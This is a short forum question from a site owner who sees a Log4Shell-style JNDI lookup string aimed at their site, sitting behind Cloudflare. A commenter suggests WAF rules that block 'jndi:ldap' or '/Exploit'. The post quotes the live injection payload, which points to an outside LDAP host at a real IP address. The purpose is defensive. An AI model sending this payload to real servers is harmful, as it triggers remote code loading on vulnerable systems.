# Site attacked: ${jndi:ldap:/93.95.216.134:1389/Exploit}

Tags: security, cloudflare, client-side-attacks

Seems someone is trying to attack my site. I'm seeing the following being attacked to the URL of my site in the blogs: ${jndi:ldap:/93.95.216.134:1389/Exploit}

Seems to be coming from Hong Kong.

My site is just throwing 400 errors so it's not doing any harm (it seems like), but how can I prevent this in the future?

The site is behind CloudFlare, just FYI.

Comment: Add a Cloudflare WAF rule to block requests that end in `/Exploit`? Or block `jndi:ldap` requests, if your website doesn't support that sort of request? It boils down to, how would you block **any** specific type of request from hitting your website like this? The answer is to find the thing in the request that you can use to identify it as an attack, and then create a Cloudflare WAF rule to block requests with that thing in them.

Comment: Much appreciated, will look in to it (not sure how to create those rules), but Google is my friend)!